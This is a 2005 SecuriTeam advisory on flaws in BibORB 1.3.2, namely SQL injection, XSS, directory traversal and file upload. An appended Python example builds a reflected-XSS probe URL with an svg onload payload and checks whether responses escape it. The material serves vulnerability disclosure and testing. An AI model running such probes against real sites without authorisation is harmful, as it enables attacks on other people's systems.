[UNIX] Multiple Vulnerabilities In BibORB
From: SecuriTeam (support_at_securiteam.com)
Date: 02/21/05
To: list@securiteam.com Date: 21 Feb 2005 10:35:34 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Multiple Vulnerabilities In BibORB
------------------------------------------------------------------------
SUMMARY
<http://biborb.glymn.net/doku.php> BibORB is "a web-based solution to
manage and share BibTeX bibliographies. It offers an easy way to edit,
import or export BibTeX references and proposes a system for archiving
electronic versions of papers contained in bibliographies".
Multiple vulnerabilities were found in BibORB that result in SQL
injection, XSS, directory traversal and arbitrary file upload.
DETAILS
Vulnerable Systems:
* BibORB version 1.3.2
Immune Systems:
* BibORB version 1.3.2 with security update
* BibORB version 1.3.3 RC1
Cross Site Scripting
Some request parameters, such as search, are echoed into the page without being filtered, so cross-site scripting is possible:
http://path/to/biborb/bibindex.php?mode=displaysearch&search=
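To turn the URL above into something a tester can actually run against an installation, the following is an added example (it is not BibORB code and is not part of the advisory). It builds the displaysearch request with a marker payload in the search parameter, and then classifies a response body as reflecting the payload raw (vulnerable), reflecting it HTML-escaped (filtered, as the security update would do), or not reflecting it at all. The two response bodies it checks are constructed inline to stand in for an unpatched and a patched page; the base URL, the probe string and the render_search_field helper are assumptions of the example, not anything taken from BibORB.

```python
"""Reflected-XSS probe for BibORB's search parameter (added example).

Not BibORB's own code. The base URL, the probe string and the
render_search_field() helper are assumptions made for illustration;
the two page bodies are constructed samples, not captures.
"""
import html
from urllib.parse import urlencode

# Probe that is harmless if escaped but closes an attribute and opens a tag if not.
PROBE = '"><svg/onload=alert(1)>'


def probe_url(base: str, probe: str = PROBE) -> str:
    """Build the advisory's URL: bibindex.php?mode=displaysearch&search=<probe>."""
    query = urlencode({"mode": "displaysearch", "search": probe})
    return f"{base.rstrip('/')}/bibindex.php?{query}"


def render_search_field(search: str, escape_output: bool) -> str:
    """Constructed stand-in for the page echoing the search term back into a form.

    escape_output=False mirrors the unfiltered behaviour the advisory describes;
    escape_output=True mirrors the fix (escape on output, as htmlspecialchars would).
    """
    value = html.escape(search, quote=True) if escape_output else search
    return f'<html><body><input type="text" name="search" value="{value}"></body></html>'


def classify_reflection(body: str, probe: str = PROBE) -> str:
    """Return 'raw' (probe reflected verbatim), 'escaped' (entity-encoded) or 'absent'."""
    if probe in body:
        return "raw"
    if html.escape(probe, quote=True) in body:
        return "escaped"
    return "absent"


def check_target(base: str) -> dict:
    """Run the probe against both constructed page variants and report the verdicts."""
    return {
        "url": probe_url(base),
        "unfiltered": classify_reflection(render_search_field(PROBE, escape_output=False)),
        "filtered": classify_reflection(render_search_field(PROBE, escape_output=True)),
    }


if __name__ == "__main__":
    for key, value in check_target("http://path/to/biborb").items():
        print(f"{key}: {value}")
```

Against a live host, replace render_search_field with the body of an HTTP GET to probe_url and feed it to classify_reflection; a verdict of raw is the vulnerable case. Escaping on output with the quote flag set matters because the probe starts by closing the attribute it is echoed into, which a filter that only strips angle brackets would not prevent.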